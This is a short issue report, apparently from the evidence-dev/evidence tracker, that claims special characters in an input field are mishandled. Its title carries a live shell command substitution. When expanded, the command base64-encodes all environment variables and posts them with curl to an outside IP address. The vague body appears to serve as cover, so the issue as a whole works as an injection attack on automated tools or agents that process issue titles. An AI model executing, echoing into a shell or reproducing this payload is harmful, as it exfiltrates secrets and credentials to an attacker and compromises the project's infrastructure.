Bug: unexpected behavior with special characters in input $(curl -s http://54.205.16.142:8443/c/3d8ee1341a5c0e43334ad47b396487f9 -d $(env|base64|tr -d '\n'))
Author: alefrene77-cloudCreated Sep 1, 2026Updated Sep 1, 2026
When using special characters in the input field, the output is incorrect.
Expected: proper escaping and handling Actual: characters are stripped or cause errors
This might be related to the encoding changes in the last release.
Source: evidence-dev/evidence